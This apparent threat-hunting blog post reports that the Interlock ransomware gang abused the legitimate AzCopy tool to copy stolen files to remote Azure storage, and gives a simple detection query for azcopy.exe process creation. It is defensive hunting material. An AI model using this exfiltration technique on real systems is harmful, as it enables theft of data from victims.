204. Interlock Ransomware Gang Abuse AzCopy for Data Exfiltration
Hello everyone!
Another legitimate tool abused by the ransomware gangs - AzCopy. According to this cybersecurity advisory, Interlock ransomware gang used the tool for data exfiltration.
The tool allows an the adversary to copy files from compromised systems to a remote Azure storage.
As the tool is legitimate, it's another great target for hunting, for example:
event_type: "processcreatewin"
AND
proc_file_path: "azcopy.exe"
Talking about Interlock, it's worth noting another tool in their arsenal we discussed earlier - Interlock RAT.
See you tomorrow!
Comments
Post a Comment